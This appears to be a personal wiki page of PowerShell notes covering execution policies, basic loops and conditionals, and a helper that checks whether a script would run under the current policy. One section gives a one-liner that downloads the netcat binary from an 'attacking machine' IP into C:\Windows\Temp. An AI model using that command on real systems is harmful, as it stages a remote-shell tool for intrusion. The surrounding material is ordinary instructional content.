====== Windows PowerShell ======

===== Execution Policies =====

PowerShell (PS) execution policies determine whether you are authorized to execute PS scripts:

  - **Restricted:** [default] Blocks all use of PS scripts
  - **AllSigned:** Requires PS scripts to be signed by a trusted publisher
  - **RemoteSigned:** This is a common "normal" setting in many systems...
    - Allows any PS script written on the local machine.
    - But requires downloaded scripts to be signed by a trusted publisher.
  - **Unrestricted:** Allows any PS script but prompts you for confirmation on downloaded scripts.
  - **Bypass:** Allows any and all PS scripts. Have at it!

Syntax for changing the PowerShell execution policy:

<code powershell>
Set-ExecutionPolicy [name]

# Example:
Set-ExecutionPolicy RemoteSigned
</code>

----

===== Example Code =====

==== One-Liner Download ====

A very useful one-liner to download a file (nc.exe) from an attacking machine (IP 192.168.77.128) and save it in C:\Windows\Temp using the same name:

<code powershell>
(New-Object System.Net.WebClient).DownloadFile("http://192.168.77.128/nc.exe", "C:\Windows\Temp\nc.exe")
</code>

==== For Loop ====

<code powershell>
Write-Host "Hello world!"

# Count up by one...
for ($var=1; $var -le 5; $var++) {
    Write-Host "The value of var is: $var"
}

# Count up by two...
for ($var=0; $var -le 10; $var=$var+2) {
    Write-Host "The value of var is: $var"
}
</code>

==== Conditional Statement ====

<code powershell>
$a = 2

if ( $a -gt 2 ) {
    Write-Host "The value $a is greater than 2."
}
elseif ( $a -eq 2 ) {
    Write-Host "The value $a is equal to 2."
}
else {
    Write-Host ( "The value of $a is less than 2" + " or was not created or initialized." )
}
</code>
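==== Policy Check ====

Added example for the Execution Policies section above (not part of the original page): a helper that reports whether a given script would be allowed under the effective policy, and why. RemoteSigned's "downloaded" test is the Zone.Identifier alternate data stream (Mark of the Web), and the signing test is the Authenticode status. The function name ''Test-ScriptPolicy'' is a made-up name for this example.

```powershell
# Hypothetical helper: explain whether a script would run under the current policy.
function Test-ScriptPolicy {
    param([Parameter(Mandatory)][string]$Path)

    # Effective policy for this session (the most specific defined scope wins).
    $effective = Get-ExecutionPolicy

    # A file downloaded from the internet carries a Zone.Identifier stream;
    # this is what RemoteSigned/Unrestricted treat as a "downloaded" script.
    $zone     = Get-Item -Path $Path -Stream Zone.Identifier -ErrorAction SilentlyContinue
    $isRemote = $null -ne $zone

    # Authenticode status: Valid, NotSigned, HashMismatch, NotTrusted, ...
    $sig      = Get-AuthenticodeSignature -FilePath $Path
    $isSigned = $sig.Status -eq 'Valid'

    $wouldRun = switch ($effective) {
        'Restricted'   { $false }
        'AllSigned'    { $isSigned }
        'RemoteSigned' { (-not $isRemote) -or $isSigned }
        'Unrestricted' { $true }   # still prompts for remote, unsigned scripts
        'Bypass'       { $true }
        default        { $false }  # anything else: treat as blocked
    }

    [pscustomobject]@{
        Path            = $Path
        EffectivePolicy = $effective
        FromInternet    = $isRemote
        SignatureStatus = $sig.Status
        Signer          = $sig.SignerCertificate.Subject
        WouldRun        = $wouldRun
    }
}

# Constructed usage: audit a script before deciding to run it.
Test-ScriptPolicy -Path 'C:\Windows\Temp\example.ps1' | Format-List
```

''Get-ExecutionPolicy -List'' shows which scope (MachinePolicy, UserPolicy, Process, CurrentUser, LocalMachine) is supplying the effective value, which matters when a Group Policy setting overrides what ''Set-ExecutionPolicy'' wrote.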